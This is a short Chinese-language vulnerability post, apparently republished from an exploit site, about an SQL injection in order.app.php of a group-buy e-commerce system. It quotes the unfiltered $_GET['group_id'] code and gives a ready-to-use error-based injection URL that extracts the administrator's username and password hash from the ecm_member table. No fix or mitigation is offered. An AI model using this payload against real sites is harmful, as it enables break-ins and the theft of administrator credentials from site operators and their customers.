来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 漏洞出现在order app php文件团购后下订单时 没有对 $_GET[ 39;group_id 39;]进行过滤function _clear_goods($order_id) { switch ($_GET[ 39;goods 39;]) {...
|
漏洞出现在order.app.php文件团购后下订单时 没有对 $_GET['group_id']进行过滤
function _clear_goods($order_id)
{
switch ($_GET['goods'])
{
case 'groupbuy':
/* 团购的商品 */
$model_groupbuy =& m('groupbuy');
$model_groupbuy->updateRelation('be_join', $_GET['group_id'], $this->visitor->get('user_id'), array(
'order_id' => $order_id,
));//这里没有对$_GET['group_id']进行过滤
break;
}
}
首先参加一个团购活动,当团购活动结束后,点击购买
 点下一步时,更改当前网址如:
http://0day5.com/index.php?app=order&goods=groupbuy&group_id=2 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23
 然后点击"下单完成并支付"将会出现注入信息,如管理员账号密码等
 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
